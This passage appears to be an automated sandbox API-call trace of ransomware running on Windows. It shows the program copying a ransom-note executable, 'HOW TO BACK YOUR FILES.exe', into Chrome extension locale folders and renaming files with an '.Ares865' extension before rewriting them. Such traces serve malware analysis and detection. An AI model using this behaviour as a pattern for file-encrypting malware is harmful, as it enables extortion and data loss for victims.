ftCreationTime.dwLowDateTime=0x85f54260, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e716a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e716a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.763] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.763] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.764] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.764] lstrlenW (lpString="messages.json") returned 13 [0101.764] lstrlenW (lpString="Ares865") returned 7 [0101.764] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.764] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.Ares865") returned 160 [0101.764] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.765] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.766] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=180) returned 1 [0101.768] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no" [0101.769] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no" [0101.769] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.769] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.769] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.769] GetLastError () returned 0x0 [0101.770] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.770] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f54260, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e716a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e716a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.770] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.770] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.770] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.770] lstrlenW (lpString="messages.json") returned 13 [0101.770] lstrlenW (lpString="Ares865") returned 7 [0101.770] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.770] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.Ares865") returned 160 [0101.770] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.772] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.772] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=150) returned 1 [0101.775] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl" [0101.775] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl" [0101.775] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.775] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.776] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.776] GetLastError () returned 0x0 [0101.776] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.776] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f2e100, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e716a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e716a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.776] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.776] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.777] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.777] lstrlenW (lpString="messages.json") returned 13 [0101.777] lstrlenW (lpString="Ares865") returned 7 [0101.777] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.777] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.Ares865") returned 160 [0101.777] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.780] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\nl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.781] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=177) returned 1 [0101.784] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne" [0101.784] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne" [0101.784] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.784] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.785] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.785] GetLastError () returned 0x0 [0101.785] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.785] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f2e100, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e73cba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e73cba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.785] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.785] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.785] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.786] lstrlenW (lpString="messages.json") returned 13 [0101.786] lstrlenW (lpString="Ares865") returned 7 [0101.786] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.786] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.Ares865") returned 160 [0101.786] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.787] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.787] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=523) returned 1 [0101.790] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms" [0101.791] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms" [0101.791] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.791] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.791] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.791] GetLastError () returned 0x0 [0101.792] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.792] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f2e100, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e73cba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e73cba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.792] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.792] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.792] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.792] lstrlenW (lpString="messages.json") returned 13 [0101.792] lstrlenW (lpString="Ares865") returned 7 [0101.792] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.792] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.Ares865") returned 160 [0101.792] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.794] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.794] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=203) returned 1 [0101.797] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr" [0101.797] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr" [0101.797] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.797] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\HOW TO BACK YOUR FILES.exe" (normalized: 